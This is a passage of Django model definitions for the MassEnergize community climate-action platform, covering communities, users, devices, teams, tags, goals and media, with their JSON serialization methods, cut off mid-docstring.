= get_json_if_not_none(self.uploaded_file) return res class Meta: ordering = ("title",) db_table = "messages" class ActivityLog(models.Model): """ A class used to represent Activity Log on the MassEnergize Platform Attributes ---------- """ id = models.AutoField(primary_key=True) path = models.CharField(max_length=SHORT_STR_LEN, default="/") user = models.ForeignKey(UserProfile, on_delete=models.CASCADE, null=True) community = models.ForeignKey(Community, on_delete=models.CASCADE, null=True) created_at = models.DateTimeField(auto_now_add=True) status = models.CharField(max_length=SHORT_STR_LEN, default="success", blank=True) trace = models.JSONField(blank=True, null=True) request_body = models.JSONField(blank=True, 
null=True) # add response or error field def __str__(self): return self.path def simple_json(self): return model_to_dict(self) def full_json(self): res = self.simple_json() res["user"] = get_json_if_not_none(self.user) res["community"] = get_json_if_not_none(self.community) return res class Meta: ordering = ("path",) db_table = "activity_logs" class Deployment(models.Model): """ A class used to represent a Deployment of the MassEnergize Platform Attributes ---------- """ id = models.AutoField(primary_key=True) version = models.CharField(max_length=SHORT_STR_LEN, default="") deploy_commander = models.CharField( max_length=SHORT_STR_LEN, default="", blank=True ) notes = models.CharField(max_length=LONG_STR_LEN, default="", blank=True) created_at = models.DateTimeField(auto_now_add=True) def __str__(self): return self.version def simple_json(self): return model_to_dict(self) def full_json(self): return self.simple_json() class Meta: db_table = "deployments" ordering = ("-version",)
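# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original models): the simple_json /
# full_json convention used by the models above is what API-layer code
# typically relies on when serializing query results. The helper name below is
# hypothetical, and `community` is assumed to be a Community instance.
def _example_published_graphs(community):
    """Hypothetical helper: serialize the published, non-deleted graphs of one community."""
    graphs = Graph.objects.filter(
        community=community, is_published=True, is_deleted=False
    )
    return [g.full_json() for g in graphs]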
import datetime import json from django.db import models from django.db.models.fields import BooleanField, related from django.db.models.query_utils import select_related_descend from database.utils.constants import * from .utils.common import json_loader, get_json_if_not_none, get_summary_info from django.forms.models import model_to_dict from carbon_calculator.models import Action as CCAction import uuid CHOICES = json_loader("./database/raw_data/other/databaseFieldChoices.json") ZIP_CODE_AND_STATES = json_loader("./database/raw_data/other/states.json") class Location(models.Model): """ A class used to represent a geographical region. It could be a complete and proper address or just a city name, zipcode, county etc Attributes ---------- type : str the type of the location, whether it is a full address, zipcode only, etc street : str The street number if it is available city : str the name of the city if available county : str the name of the county if available state: str the name of the state if available more_info: JSON any anotheraction() dynamic information we would like to store about this location """ id = models.AutoField(primary_key=True) location_type = models.CharField( max_length=TINY_STR_LEN, choices=CHOICES.get("LOCATION_TYPES", {}).items() ) street = models.CharField(max_length=SHORT_STR_LEN, blank=True) unit_number = models.CharField(max_length=SHORT_STR_LEN, blank=True) zipcode = models.CharField(max_length=SHORT_STR_LEN, blank=True) city = models.CharField(max_length=SHORT_STR_LEN, blank=True) county = models.CharField(max_length=SHORT_STR_LEN, blank=True) is_deleted = models.BooleanField(default=False, blank=True) state = models.CharField( max_length=SHORT_STR_LEN, choices=ZIP_CODE_AND_STATES.items(), blank=True ) country = models.CharField(max_length=SHORT_STR_LEN, default="US", blank=True) more_info = models.JSONField(blank=True, null=True) def __str__(self): # show full loc regardless of tye type its labelled as loc = "" d = lambda: ", " if loc != "" else "" if self.street: loc += self.street if self.unit_number: loc += d() + "#" + self.unit_number if self.city: loc += d() + self.city if self.zipcode: loc += d() + self.zipcode if self.county: loc += d() + self.county if self.state: loc += d() + self.state if self.country and self.country != "US": loc += d() + self.country loc += "-" + self.location_type return loc def simple_json(self): return model_to_dict(self) def full_json(self): return self.simple_json() class Meta: db_table = "locations" class Media(models.Model): """ A class used to represent any Media that is uploaded to this website Attributes ---------- name : SlugField The short name for this media. It cannot only contain letters, numbers, hypens and underscores. No spaces allowed. file : File the file that is to be stored. media_type: str the type of this media file whether it is an image, video, pdf etc. 
""" id = models.AutoField(primary_key=True) name = models.SlugField(max_length=SHORT_STR_LEN, blank=True) file = models.FileField(upload_to="media/") media_type = models.CharField(max_length=SHORT_STR_LEN, blank=True) is_deleted = models.BooleanField(default=False, blank=True) order = models.PositiveIntegerField(default=0, blank=True, null=True) def __str__(self): return str(self.id) + "-" + self.name + "(" + self.file.name + ")" def simple_json(self): return { "id": self.id, "url": self.file.url, } def full_json(self): return { "id": self.id, "name": self.name, "url": self.file.url, "media_type": self.media_type, } class Meta: db_table = "media" ordering = ("order", "name") class Policy(models.Model): """ A class used to represent a Legal Policy. For instance the Terms and Agreement Statement that users have to agree to during sign up. Attributes ---------- name : str name of the Legal Policy description: str the details of this policy communities_applied: how many communities this policy applies to. is_global: boolean True if this policy should apply to all the communities info: JSON dynamic information goes in here """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=LONG_STR_LEN, db_index=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) is_global = models.BooleanField(default=False, blank=True) is_deleted = models.BooleanField(default=False, blank=True) more_info = models.JSONField(blank=True, null=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): return model_to_dict(self) def full_json(self): # would this blow up because no community_set? res = model_to_dict(self) community = self.community_set.all().first() if community: res["community"] = get_json_if_not_none(community) return res class Meta: ordering = ("name",) db_table = "legal_policies" verbose_name_plural = "Legal Policies" class Goal(models.Model): """ A class used to represent a Goal Attributes ---------- name : str A short title for this goal status: str the status of this goal whether it has been achieved or not. 
description: More details about this goal target_date: Date at which goal should be achieved created_at: DateTime The date and time that this goal was added created_at: DateTime The date and time of the last time any updates were made to the information about this goal """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) description = models.TextField(max_length=LONG_STR_LEN, blank=True) target_number_of_households = models.PositiveIntegerField(default=0, blank=True) target_number_of_actions = models.PositiveIntegerField(default=0, blank=True) target_carbon_footprint_reduction = models.PositiveIntegerField( default=0, blank=True ) initial_number_of_households = models.PositiveIntegerField(default=0, blank=True) initial_number_of_actions = models.PositiveIntegerField(default=0, blank=True) initial_carbon_footprint_reduction = models.PositiveIntegerField( default=0, blank=True ) attained_number_of_households = models.PositiveIntegerField(default=0, blank=True) attained_number_of_actions = models.PositiveIntegerField(default=0, blank=True) attained_carbon_footprint_reduction = models.PositiveIntegerField( default=0, blank=True ) organic_attained_number_of_households = models.PositiveIntegerField( default=0, blank=True ) organic_attained_number_of_actions = models.PositiveIntegerField( default=0, blank=True ) organic_attained_carbon_footprint_reduction = models.PositiveIntegerField( default=0, blank=True ) target_date = models.DateField(null=True) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return f"{self.name} {' - Deleted' if self.is_deleted else ''}" def simple_json(self): return model_to_dict(self, exclude=["is_deleted"]) def full_json(self): return self.simple_json() class Meta: db_table = "goals" class Community(models.Model): """ A class used to represent a Community on this platform. Attributes ---------- name : str The short name for this Community subdomain : str (can only contain alphabets, numbers, hyphen and underscores) a primary unique identifier for this Community. They would need the same to access their website. For instance if the subdomain is wayland they would access their portal through wayland.massenergize.org owner: JSON information about the name, email and phone of the person who is supposed to be owner and main administrator when this Community account is opened. logo : int Foreign Key to Media that holds logo of community banner : int Foreign Key to Media that holds logo of community is_geographically_focused: boolean Information about whether this community is geographically focused or dispersed is_approved: boolean This field is set to True if the all due diligence has been done by the Super Admins and the community is not allowed to operate. 
created_at: DateTime The date and time that this community was created policies: ManyToMany policies created by community admins for this community created_at: DateTime The date and time of the last time any updates were made to the information about this community more_info: JSON any another dynamic information we would like to store about this location """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) subdomain = models.SlugField(max_length=SHORT_STR_LEN, unique=True, db_index=True) owner_name = models.CharField(max_length=SHORT_STR_LEN, default="Unknown") owner_email = models.EmailField(blank=False) owner_phone_number = models.CharField( blank=True, null=True, max_length=SHORT_STR_LEN ) about_community = models.TextField(max_length=LONG_STR_LEN, blank=True) logo = models.ForeignKey( Media, on_delete=models.SET_NULL, null=True, blank=True, related_name="community_logo", ) banner = models.ForeignKey( Media, on_delete=models.SET_NULL, null=True, blank=True, related_name="community_banner", ) favicon = models.ForeignKey( Media, on_delete=models.SET_NULL, null=True, blank=True, related_name="community_favicon", ) goal = models.ForeignKey(Goal, blank=True, null=True, on_delete=models.SET_NULL) is_geographically_focused = models.BooleanField(default=False, blank=True) # deprecated: location of community was originally a JSON string; now defined below in locations (link to Location model) location = models.JSONField(blank=True, null=True) # new - define the geographic area for a community (zipcodes, towns/cities, counties, states, countries) geography_type = models.CharField( max_length=TINY_STR_LEN, choices=CHOICES.get("COMMUNITY_GEOGRAPHY_TYPES", {}).items(), blank=True, null=True, ) # locations defines the range for geographic communities locations = models.ManyToManyField(Location, blank=True) policies = models.ManyToManyField(Policy, blank=True) is_approved = models.BooleanField(default=False, blank=True) accepted_terms_and_conditions = models.BooleanField(default=True) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) more_info = models.JSONField(blank=True, null=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return str(self.id) + " - " + self.name def info(self): return model_to_dict(self, ["id", "name", "subdomain"]) def simple_json(self): res = model_to_dict( self, [ "id", "name", "subdomain", "is_approved", "owner_phone_number", "owner_name", "owner_email", "is_geographically_focused", "is_published", "is_approved", "more_info", "location", ], ) res["logo"] = get_json_if_not_none(self.logo) res["favicon"] = get_json_if_not_none(self.favicon) return res def full_json(self): admin_group: CommunityAdminGroup = CommunityAdminGroup.objects.filter( community__id=self.pk ).first() if admin_group: admins = [a.simple_json() for a in admin_group.members.all()] else: admins = [] customDomain: CustomCommunityWebsiteDomain = ( CustomCommunityWebsiteDomain.objects.filter(community__id=self.pk) ) website = None if customDomain: website = customDomain.first().website # get the community goal goal = get_json_if_not_none(self.goal) or {} # goal defined consistently; not differently in two places if self.is_geographically_focused: goal[ "organic_attained_number_of_households" ] = RealEstateUnit.objects.filter(is_deleted=False, community=self).count() done_actions = UserActionRel.objects.filter( 
real_estate_unit__community=self, status="DONE" ).prefetch_related("action__calculator_action") else: community_members = CommunityMember.objects.filter( is_deleted=False, community=self ).select_related("user") users = [cm.user for cm in community_members] members_count = community_members.count() goal["organic_attained_number_of_households"] = members_count done_actions = UserActionRel.objects.filter( user__in=users, status="DONE" ).prefetch_related("action__calculator_action") goal["organic_attained_number_of_actions"] = done_actions.count() carbon_footprint_reduction = 0 for actionRel in done_actions: if actionRel.action and actionRel.action.calculator_action: carbon_footprint_reduction += ( actionRel.action.calculator_action.average_points ) goal["organic_attained_carbon_footprint_reduction"] = carbon_footprint_reduction locations = "" for loc in self.locations.all(): if locations != "": locations += ", " if self.geography_type == "ZIPCODE": l = loc.zipcode elif self.geography_type == "CITY": l = loc.city elif self.geography_type == "COUNTY": l = loc.county elif self.geography_type == "STATE": l = loc.state elif self.geography_type == "COUNTRY": l = loc.country else: l = loc.zipcode locations += l return { "id": self.id, "name": self.name, "subdomain": self.subdomain, "website": website, "owner_name": self.owner_name, "owner_email": self.owner_email, "owner_phone_number": self.owner_phone_number, "goal": goal, "about_community": self.about_community, "logo": get_json_if_not_none(self.logo), "favicon": get_json_if_not_none(self.favicon), "location": self.location, "is_approved": self.is_approved, "is_published": self.is_published, "is_geographically_focused": self.is_geographically_focused, "banner": get_json_if_not_none(self.banner), "created_at": self.created_at, "updated_at": self.updated_at, "more_info": self.more_info, "admins": admins, "geography_type": self.geography_type, "locations": locations, } class Meta: verbose_name_plural = "Communities" db_table = "communities" class RealEstateUnit(models.Model): """ A class used to represent a Real Estate Unit. Attributes ---------- unit_type : str The type of this unit eg. 
Residential, Commercial, etc location: Location the geographic address or location of this real estate unit created_at: DateTime The date and time that this real estate unity was added created_at: DateTime The date and time of the last time any updates were made to the information about this real estate unit """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) unit_type = models.CharField( max_length=TINY_STR_LEN, choices=CHOICES.get("REAL_ESTATE_TYPES", {}).items() ) community = models.ForeignKey( Community, null=True, on_delete=models.SET_NULL, blank=True ) location = models.JSONField(blank=True, null=True) # added 1/28/21 - redundant to location, address will have Zip code, defining which community the REU is in address = models.ForeignKey(Location, null=True, on_delete=models.SET_NULL) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) def is_commercial(self): return self.unit_type == "C" def is_residential(self): return self.unit_type == "R" def __str__(self): return f"{self.community}|{self.unit_type}|{self.name}" def simple_json(self): # return model_to_dict(self) res = model_to_dict(self) res["location"] = get_json_if_not_none(self.address) return res def full_json(self): return self.simple_json() class Meta: db_table = "real_estate_units" class Role(models.Model): """ A class used to represent Role for users on the MassEnergize Platform Attributes ---------- name : str name of the role """ id = models.AutoField(primary_key=True) name = models.CharField( max_length=TINY_STR_LEN, choices=CHOICES.get("ROLE_TYPES", {}).items(), unique=True, ) description = models.TextField(max_length=LONG_STR_LEN, blank=True) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return CHOICES.get("ROLE_TYPES", {})[self.name] def simple_json(self): return model_to_dict(self) def full_json(self): return self.simple_json() class Meta: ordering = ("name",) db_table = "roles" class UserProfile(models.Model): """ A class used to represent a MassEnergize User Note: Authentication is handled by firebase so we just need emails Attributes ---------- email : str email of the user. Should be unique. user_info: JSON a JSON representing the name, bio, etc for this user. bio: A short biography of this user is_super_admin: boolean True if this user is an admin False otherwise is_community_admin: boolean True if this user is an admin for a community False otherwise is_vendor: boolean True if this user is a vendor False otherwise other_info: JSON any another dynamic information we would like to store about this UserProfile created_at: DateTime The date and time that this goal was added created_at: DateTime The date and time of the last time any updates were made to the information about this goal #TODO: roles field: if we have this do we need is_superadmin etc? also why # not just one? 
why many to many """ id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=True) full_name = models.CharField(max_length=SHORT_STR_LEN, null=True) profile_picture = models.ForeignKey( Media, on_delete=models.SET_NULL, blank=True, null=True, related_name="profile_picture", ) preferred_name = models.CharField(max_length=SHORT_STR_LEN, null=True) email = models.EmailField(unique=True, db_index=True) user_info = models.JSONField(blank=True, null=True) real_estate_units = models.ManyToManyField( RealEstateUnit, related_name="user_real_estate_units", blank=True ) goal = models.ForeignKey(Goal, blank=True, null=True, on_delete=models.SET_NULL) communities = models.ManyToManyField(Community, blank=True) roles = models.ManyToManyField(Role, blank=True) is_super_admin = models.BooleanField(default=False, blank=True) is_community_admin = models.BooleanField(default=False, blank=True) is_vendor = models.BooleanField(default=False, blank=True) other_info = models.JSONField(blank=True, null=True) accepts_terms_and_conditions = models.BooleanField(default=False, blank=True) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) preferences = models.JSONField(default=dict, null=True, blank=True) visit_log = models.JSONField(default=list, null=True, blank=True) def __str__(self): return self.email def info(self): return model_to_dict(self, ["id", "email", "full_name"]) def simple_json(self): res = model_to_dict( self, [ "id", "full_name", "preferred_name", "email", "is_super_admin", "is_community_admin", ], ) res["joined"] = self.created_at.date() res["user_info"] = self.user_info res["profile_picture"] = get_json_if_not_none(self.profile_picture) res["communities"] = [ c.community.name for c in CommunityMember.objects.filter(user=self) ] res["households"] = [h.simple_json() for h in self.real_estate_units.all()] return res def update_visit_log(self, date_time): try: new_format = "%Y/%m/%d" date = date_time.strftime(new_format) # We adapt the old fomat to the new one if type(self.visit_log) == dict: old = self.visit_log new = [] for day in old.keys(): old_format = "%d/%m/%Y" dt_object = datetime.datetime.strptime(day, old_format) day = dt_object.strftime(new_format) new.append(day) self.visit_log = new if type(self.visit_log) == list: if len(self.visit_log) > 0: if date != self.visit_log[-1]: self.visit_log.append(date) else: self.visit_log.append(date) except Exception as e: print(e) return None, e def full_json(self): team_members = [t.team.info() for t in TeamMember.objects.filter(user=self)] community_members = CommunityMember.objects.filter(user=self) communities = [cm.community.info() for cm in community_members] # admin_at = [ // TODO: Remove -> because we stopped using this, and started using CommunityAdminGroupBelow # cm.community.info() # for cm in CommunityMember.objects.filter(user=self, is_admin=True) # ] data = model_to_dict( self, exclude=["real_estate_units", "communities", "roles"] ) data["joined"] = self.created_at.date() admin_at = [ get_json_if_not_none(c.community) for c in self.communityadmingroup_set.all() ] data["households"] = [h.simple_json() for h in self.real_estate_units.all()] data["goal"] = get_json_if_not_none(self.goal) data["communities"] = communities data["admin_at"] = admin_at data["teams"] = team_members data["profile_picture"] = get_json_if_not_none(self.profile_picture) data["visit_log"] = self.visit_log return data class Meta: db_table = 
"user_profiles" ordering = ("-created_at",) class UserMediaUpload(models.Model): """A class that creates a relationship between a user(all user kinds) on the platform and media they have uploaded""" id = models.AutoField(primary_key=True) user = models.ForeignKey( UserProfile, null=True, related_name="uploads", on_delete=models.DO_NOTHING, ) communities = models.ManyToManyField( Community, related_name="community_uploads", ) media = models.OneToOneField( Media, null=True, related_name="user_upload", on_delete=models.CASCADE, ) is_universal = BooleanField( default=False ) # True value here means image is available to EVERYONE, and EVERY COMMUNITY settings = models.JSONField(null=True, blank=True) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) def __str__(self): return f"{str(self.id)} - {self.media.name} from {self.user.preferred_name or self.user.full_name} " def simple_json(self): res = model_to_dict( self, ["settings", "media", "created_at", "id", "is_universal"] ) res["user"] = get_summary_info(self.user) res["image"] = get_json_if_not_none(self.media) res["communities"] = [get_summary_info(com) for com in self.communities.all()] return res def full_json(self): return self.simple_json() class DeviceProfile(models.Model): """ A class used to represent a MassEnergize User's Device Attributes ---------- user_profiles : JSON A JSON object containing all user ids (as foreign keys) for any users asociated with this device. IP_address: Char The asociated IP address with this device. device_type: Char The type of device we see from the HTTP request. operating_system: The operating system we see from the HTTP request. browser: The browser we see from the HTTP request. visit_log: A JSON object containing a history of dates. Activity will only be logged here if there is a user attached to the device and they are logged in. 
#TODO: """ id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=True) user_profiles = models.ManyToManyField(UserProfile, blank=True) ip_address = models.CharField(max_length=SHORT_STR_LEN, null=True) location = models.ManyToManyField(Location, blank=True) device_type = models.CharField(max_length=SHORT_STR_LEN, null=True) operating_system = models.CharField(max_length=SHORT_STR_LEN, null=True) browser = models.CharField(max_length=SHORT_STR_LEN, null=True) visit_log = models.JSONField(default=list, null=True, blank=True) is_deleted = models.BooleanField(default=False, blank=True) def get_user_profiles(self): return list(self.user_profiles.all()) def get_visit_log(self): return self.visit_log def update_device_location(self, location): self.location.add(location) def update_user_profiles(self, user): self.user_profiles.add(user) def update_visit_log(self, date_time): try: new_format = "%Y/%m/%d" date = date_time.strftime(new_format) # We adapt the old format to the new one if type(self.visit_log) == dict: old = self.visit_log new = [] for day in old.keys(): old_format = "%d/%m/%Y" dt_object = datetime.datetime.strptime(day, old_format) day = dt_object.strftime(new_format) new.append(day) self.visit_log = new if type(self.visit_log) == list: if len(self.visit_log) > 0: if date != self.visit_log[-1]: self.visit_log.append(date) else: self.visit_log.append(date) except Exception as e: print(e) return None, e def simple_json(self): res = model_to_dict( self, [ "id", "ip_address", "device_type", "operating_system", "browser", "visit_log", "is_deleted", ], ) res["user_profiles"] = [u.simple_json() for u in self.user_profiles.all()] return res def full_json(self): return self.simple_json() class CommunityMember(models.Model): id = models.AutoField(primary_key=True) community = models.ForeignKey(Community, on_delete=models.CASCADE) user = models.ForeignKey(UserProfile, on_delete=models.CASCADE) is_admin = models.BooleanField(blank=True, default=False) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return f"{self.user} is {'an ADMIN' if self.is_admin else 'a MEMBER'} in Community({self.community})" def simple_json(self): res = model_to_dict(self, ["id", "is_admin"]) res["community"] = get_summary_info(self.community) res["user"] = get_summary_info(self.user) return res def full_json(self): return self.simple_json() class Meta: db_table = "community_members_and_admins" unique_together = [["community", "user"]] ordering = ("-created_at",) class Subdomain(models.Model): id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, unique=True) community = models.ForeignKey( Community, on_delete=models.SET_NULL, null=True, related_name="subdomain_community", ) in_use = models.BooleanField(default=False, blank=True) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) def __str__(self): return f"{self.community} - {self.name}" def simple_json(self): res = model_to_dict(self, ["id", "in_use", "name", "created_at", "updated_at"]) res["community"] = get_summary_info(self.community) return res def full_json(self): return self.simple_json() class Meta: db_table = "subdomains" class CustomCommunityWebsiteDomain(models.Model): id = models.AutoField(primary_key=True) website = models.CharField(max_length=SHORT_STR_LEN, unique=True) community = models.ForeignKey( Community, 
on_delete=models.SET_NULL, null=True, related_name="community_website", ) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) def __str__(self): return f"{self.website}-{self.community}" def simple_json(self): res = model_to_dict(self, ["id", "website", "created_at", "updated_at"]) res["community"] = get_summary_info(self.community) return res def full_json(self): return self.simple_json() class Meta: db_table = "custom_community_website_domain" class Team(models.Model): """ A class used to represent a Team in a community Attributes ---------- name : str name of the team. Need not be unique description: str description of this team admins: ManyToMany administrators for this team members: ManyToMany the team members community: which community this team is a part of logo: Foreign Key to Media file represtenting the logo for this team banner: Foreign Key to Media file represtenting the banner for this team created_at: DateTime The date and time that this goal was added created_at: DateTime The date and time of the last time any updates were made to the information about this goal """ id = models.AutoField(primary_key=True) # Team names should be unique globally (Not!) name = models.CharField(max_length=SHORT_STR_LEN) tagline = models.CharField(max_length=SHORT_STR_LEN, blank=True) description = models.TextField(max_length=LONG_STR_LEN, blank=True) admins = models.ManyToManyField(UserProfile, related_name="team_admins", blank=True) # not used members = models.ManyToManyField( UserProfile, related_name="team_members", blank=True ) # change this from ForeignKey to ManyToManyField to allow team to span communities # rename community to primary_community - this is the one whose cadmin can add/delete other communities, and which is unique with name communities = models.ManyToManyField( Community, related_name="community_teams", blank=True ) primary_community = models.ForeignKey( Community, related_name="primary_community_teams", on_delete=models.CASCADE ) images = models.ManyToManyField( Media, related_name="teams" ) # 0 or more photos - could be a slide show video_link = models.CharField( max_length=LONG_STR_LEN, blank=True ) # allow one video is_closed = models.BooleanField( default=False, blank=True ) # by default, teams are open team_page_options = models.JSONField( blank=True, null=True ) # settable team page options parent = models.ForeignKey( "self", null=True, on_delete=models.SET_NULL ) # for the case of sub-teams goal = models.ForeignKey(Goal, blank=True, null=True, on_delete=models.SET_NULL) logo = models.ForeignKey( Media, on_delete=models.SET_NULL, null=True, blank=True, related_name="team_logo", ) banner = models.ForeignKey( Media, on_delete=models.SET_NULL, null=True, blank=True, related_name="team_banner", ) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def is_admin(self, UserProfile): return self.admins.filter(id=UserProfile.id) # def is_member(self, UserProfile): # return self.members.filter(id=UserProfile.id) def __str__(self): return self.name def info(self): return model_to_dict(self, ["id", "name", "tagline", "description"]) def simple_json(self): res = self.info() res["primary_community"] = get_json_if_not_none(self.primary_community) res["logo"] = get_json_if_not_none(self.logo) res["is_closed"] = self.is_closed res["is_published"] = self.is_published 
res["parent"] = get_json_if_not_none(self.parent) return res def full_json(self): data = self.simple_json() # Q: should this be in simple_json? data["communities"] = [c.simple_json() for c in self.communities.all()] data["admins"] = [a.simple_json() for a in self.admins.all()] data["members"] = [m.simple_json() for m in self.members.all()] data["goal"] = get_json_if_not_none(self.goal) data["banner"] = get_json_if_not_none(self.banner) return data class Meta: ordering = ("name",) db_table = "teams" unique_together = [["primary_community", "name"]] class TeamMember(models.Model): id = models.AutoField(primary_key=True) team = models.ForeignKey(Team, on_delete=models.CASCADE) user = models.ForeignKey(UserProfile, on_delete=models.CASCADE) is_admin = models.BooleanField(blank=True, default=False) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) def __str__(self): return f"{self.user} is {'an ADMIN' if self.is_admin else 'a MEMBER'} in Team({self.team})" def simple_json(self): res = model_to_dict(self, ["id", "is_admin"]) res["team"] = get_summary_info(self.team) res["user"] = get_summary_info(self.user) return res def full_json(self): return self.simple_json() class Meta: db_table = "team_members_and_admins" unique_together = [["team", "user"]] class Service(models.Model): """ A class used to represent a Service provided by a Vendor Attributes ---------- name : str name of the service description: str description of this service image: int Foreign Key to a Media file represtenting an image for this service if any icon: str a string description of an icon class for this service if any info: JSON any another dynamic information we would like to store about this Service created_at: DateTime The date and time that this goal was added created_at: DateTime The date and time of the last time any updates were made to the information about this goal """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, unique=True) description = models.CharField(max_length=LONG_STR_LEN, blank=True) service_location = models.JSONField(blank=True, null=True) image = models.ForeignKey(Media, blank=True, null=True, on_delete=models.SET_NULL) icon = models.CharField(max_length=SHORT_STR_LEN, blank=True) info = models.JSONField(blank=True, null=True) created_at = models.DateTimeField(auto_now_add=True) updated_at = models.DateTimeField(auto_now=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): return model_to_dict( self, ["id", "name", "description", "service_location", "icon"] ) def full_json(self): return self.simple_json() class Meta: db_table = "services" class ActionProperty(models.Model): """ A class used to represent an Action property. 
Attributes ---------- name : str name of the property """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, unique=True) short_description = models.CharField(max_length=LONG_STR_LEN, blank=True) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return self.name def simple_json(self): return model_to_dict(self) def full_json(self): return self.simple_json() class Meta: verbose_name_plural = "Properties" ordering = ("id",) db_table = "action_properties" class CarbonEquivalency(models.Model): """ Represents a carbon equivalency that can make carbon impact more comprehensible to users. Attributes ---------- name : str Name of the unit used. E.g. "Tree" value: float Value is how many pounds per year of CO2 per unit of this. Use https://www.epa.gov/energy/greenhouse-gas-equivalencies-calculator icon: Graphic representing the appropriate equivalency. explanation: str Additional information on the equivalency. E.g. "A typical hardwood tree can absorb as much as 48 pounds of carbon dioxide per year" reference: str Source of information used. Link, book, study, etc. date: DateTime Timestamp of when the equivalency was last modified. """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=50) value = models.FloatField() icon = models.CharField(max_length=50) title = models.CharField(max_length=40, null=True, blank=True) explanation = models.CharField(max_length=100) reference = models.CharField(max_length=100) date = models.DateTimeField(auto_now=True) def __str__(self): return self.name def simple_json(self): return model_to_dict(self) def full_json(self): return self.simple_json() class Meta: verbose_name_plural = "CarbonEquivalencies" ordering = ("id",) db_table = "carbon_equivalencies" class TagCollection(models.Model): """ A class used to represent a collection of Tags. Attributes ---------- name : str name of the Tag Collection """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN, unique=True) is_global = models.BooleanField(default=False, blank=True) allow_multiple = models.BooleanField(default=False) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) rank = models.PositiveIntegerField(default=0) def __str__(self): return self.name def simple_json(self): res = model_to_dict(self) res["tags"] = [t.simple_json() for t in self.tag_set.all()] return res def full_json(self): return self.simple_json() class Meta: ordering = ("name",) db_table = "tag_collections" class Tag(models.Model): """ A class used to represent a Tag. 
It is essentially a string that can be used to describe or group items, actions, etc Attributes ---------- name : str name of the Tag """ id = models.AutoField(primary_key=True) name = models.CharField(max_length=SHORT_STR_LEN) points = models.PositiveIntegerField(null=True, blank=True) icon = models.CharField(max_length=SHORT_STR_LEN, blank=True) tag_collection = models.ForeignKey( TagCollection, null=True, on_delete=models.CASCADE, blank=True ) rank = models.PositiveIntegerField(default=0) is_deleted = models.BooleanField(default=False, blank=True) is_published = models.BooleanField(default=False, blank=True) def __str__(self): return "%s - %s" % (self.name, self.tag_collection) def simple_json(self): res = model_to_dict(self) res["order"] = self.rank res["tag_collection_name"] = ( None if not self.tag_collection else self.tag_collection.name ) return res def full_json(self): data = self.simple_json() data["tag_collection"] = get_json_if_not_none(self.tag_collection) return data class Meta: ordering = ("rank",) db_table = "tags" unique_together = [["rank", "name", "tag_collection"]] class Vendor(models.Model): """ A class used to represent a Vendor/Contractor that provides a service associated with any of the actions. Attributes ---------- name : str name of the Vendor description: str description of this service logo: int Foreign Key to Media file represtenting the logo for this Vendor banner: int Foreign Key to Media file represtenting the banner for this Vendor address: int Foreign Key for Location of this Vendor key_contact: int Foreign Key for MassEnergize User that is the key contact for this vendor service_area: str Information about whether this vendor provides services nationally, statewide, county or Town services only properties_services: str Whether this vendor services Residential or Commercial units only onboarding_date: DateTime When this vendor was onboard-ed on the MassEnergize Platform for this community onboarding_contact: Which MassEnergize Staff/User onboard-ed this vendor verification_checklist: contains information about some steps and checks needed for due diligence to be done on this vendor eg. 
